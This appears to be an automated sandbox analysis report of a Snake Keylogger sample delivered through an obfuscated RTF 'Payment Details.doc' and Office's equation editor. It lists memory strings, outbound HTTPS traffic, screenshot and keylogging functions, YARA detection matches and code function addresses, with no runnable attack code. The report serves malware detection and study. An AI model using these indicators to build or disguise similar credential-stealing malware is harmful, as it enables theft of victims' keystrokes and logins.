                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002521000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                Source: ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
                Source: ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                Source: ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003651000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003686000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000035D2000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
                Source: ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003588000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                Source: ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003588000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                Source: ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000035AA000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000363C000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000365E000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000035E2000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003696000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49178 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to capture screen (.Net source)
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Contains functionality to log keystrokes (.Net Source)
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Initial sample is an obfuscated RTF file
                Source: initial sampleStatic file information: Filename: Payment Details.doc
                Malicious sample detected (through community Yara rule)
                Source: Payment Details.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: ncfplgpeter20306.exe PID: 3444, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: ncfplgpeter20306.exe PID: 3520, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Office equation editor drops PE file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 5_2_0017604B5_2_0017604B
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 5_2_00173C105_2_00173C10
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 5_2_0017B1525_2_0017B152
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 5_2_0017B1605_2_0017B160
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 5_2_0017A4085_2_0017A408
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 5_2_0017B5985_2_0017B598
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 5_2_0017B5885_2_0017B588
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 5_2_0017A8405_2_0017A840
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 5_2_0017AC785_2_0017AC78
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C903A9_2_001C903A
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C390C9_2_001C390C
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C895E9_2_001C895E
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C31B19_2_001C31B1
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C42179_2_001C4217
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C72009_2_001C7200
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C82789_2_001C8278
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C4A9F9_2_001C4A9F
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C9BC29_2_001C9BC2
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C34829_2_001C3482
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C44FF9_2_001C44FF
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C4D6F9_2_001C4D6F
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C5E709_2_001C5E70
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001CDEC89_2_001CDEC8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C67289_2_001C6728
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C47D09_2_001C47D0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001CEA209_2_001CEA20
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001CF3519_2_001CF351
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001CFC809_2_001CFC80
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001CEEB89_2_001CEEB8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001CDEB99_2_001CDEB9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001CD7309_2_001CD730
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001CD7409_2_001CD740
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001CF7E89_2_001CF7E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00701C609_2_00701C60
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007080609_2_00708060
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007000409_2_00700040
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007064409_2_00706440
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007048209_2_00704820
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007048109_2_00704810
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00702C009_2_00702C00
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007090009_2_00709000
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007028E09_2_007028E0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00708CE09_2_00708CE0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00708CD09_2_00708CD0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00700CC09_2_00700CC0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007070C09_2_007070C0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00700CB09_2_00700CB0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007054A09_2_007054A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007054909_2_00705490
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007038809_2_00703880
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007035609_2_00703560
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007019409_2_00701940
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00707D409_2_00707D40
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00707D309_2_00707D30
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007061209_2_00706120
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007045009_2_00704500
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007041E09_2_007041E0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007025C09_2_007025C0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007089C09_2_007089C0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007089B09_2_007089B0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007009A09_2_007009A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00706DA09_2_00706DA0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007051809_2_00705180
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00704E609_2_00704E60
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007032409_2_00703240
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007016209_2_00701620
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00707A209_2_00707A20
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00705E009_2_00705E00
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00705AE09_2_00705AE0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00703EC09_2_00703EC0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007022A09_2_007022A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007086A09_2_007086A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007006809_2_00700680
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00706A809_2_00706A80
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007003609_2_00700360
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007067609_2_00706760
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00704B409_2_00704B40
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00702F209_2_00702F20
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007093209_2_00709320
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007013009_2_00701300
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007077009_2_00707700
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00700FE09_2_00700FE0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007073E09_2_007073E0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007057C09_2_007057C0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00703BA09_2_00703BA0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00701F809_2_00701F80
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007083809_2_00708380
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007187489_2_00718748
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00719F309_2_00719F30
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007160789_2_00716078
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071F0789_2_0071F078
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071F0679_2_0071F067
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007120689_2_00712068
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00719A689_2_00719A68
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007160689_2_00716068
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007140509_2_00714050
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071B2509_2_0071B250
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00719A589_2_00719A58
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007100409_2_00710040
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00716E409_2_00716E40
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071B2409_2_0071B240
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007140429_2_00714042
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00712E309_2_00712E30
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00716E329_2_00716E32
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071CA389_2_0071CA38
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071E2209_2_0071E220
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071CA289_2_0071CA28
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00718C109_2_00718C10
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071E2109_2_0071E210
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00714E189_2_00714E18
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00710E089_2_00710E08
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00717C089_2_00717C08
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071FA089_2_0071FA08
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00714E089_2_00714E08
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007144E89_2_007144E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071E6E89_2_0071E6E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071E6D79_2_0071E6D7
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007104D89_2_007104D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007172D89_2_007172D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007190D89_2_007190D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007144D89_2_007144D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071A8C09_2_0071A8C0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007190C99_2_007190C9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007132C89_2_007132C8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007172CA9_2_007172CA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007152B09_2_007152B0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071A8B09_2_0071A8B0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007152A19_2_007152A1
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007112A09_2_007112A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007180A09_2_007180A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071C0A89_2_0071C0A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071D8909_2_0071D890
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007112909_2_00711290
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007180909_2_00718090
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071D8809_2_0071D880
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007109709_2_00710970
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007177709_2_00717770
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071C5709_2_0071C570
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007149709_2_00714970
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071AD789_2_0071AD78
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007177619_2_00717761
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007137609_2_00713760
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071DD589_2_0071DD58
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071F5409_2_0071F540
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071DD479_2_0071DD47
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007157489_2_00715748
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071F5309_2_0071F530
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007157399_2_00715739
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007117389_2_00711738
